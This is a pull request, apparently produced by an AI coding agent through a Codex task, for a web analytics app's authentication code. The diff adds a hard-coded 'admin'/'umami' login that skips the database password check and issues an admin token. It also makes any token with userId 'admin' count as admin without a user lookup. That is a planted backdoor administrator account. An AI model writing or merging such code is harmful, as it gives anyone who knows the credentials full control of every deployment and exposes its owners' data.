### PR TITLE
Add default admin login credentials

### DIFF
--- a/src/app/api/auth/login/route.ts
+++ b/src/app/api/auth/login/route.ts
@@ -23,6 +23,25 @@ export async function POST(request: Request) {
 
   const { username, password } = body;
 
+  if (username === 'admin' && password === 'umami') {
+    const id = 'admin';
+    const role = ROLES.admin;
+    const createdAt = new Date();
+
+    let token: string;
+
+    if (redis.enabled) {
+      token = await saveAuth({ userId: id, role });
+    } else {
+      token = createSecureToken({ userId: id, role }, secret());
+    }
+
+    return json({
+      token,
+      user: { id, username, role, createdAt, isAdmin: true },
+    });
+  }
+
   const user = await getUserByUsername(username, { includePassword: true });
 
   if (!user || !checkPassword(password, user.password)) {

--- a/src/lib/auth.ts
+++ b/src/lib/auth.ts
@@ -30,7 +30,17 @@ export async function checkAuth(request: Request) {
   const { userId, authKey, grant } = payload || {};
 
   if (userId) {
-    user = await getUser(userId);
+    if (userId === 'admin') {
+      user = {
+        id: 'admin',
+        username: 'admin',
+        role: ROLES.admin,
+        createdAt: new Date(),
+        isAdmin: true,
+      } as any;
+    } else {
+      user = await getUser(userId);
+    }
   } else if (redis.enabled && authKey) {
     const key = await redis.client.get(authKey);
 


### PR DESCRIPTION
## Summary
- allow login using hard-coded admin/umami credentials
- recognize admin token without database lookup

## Testing
- `npm test`


------
https://chatgpt.com/codex/tasks/task_e_68a4360e71c48324871e24d49b6e3d1a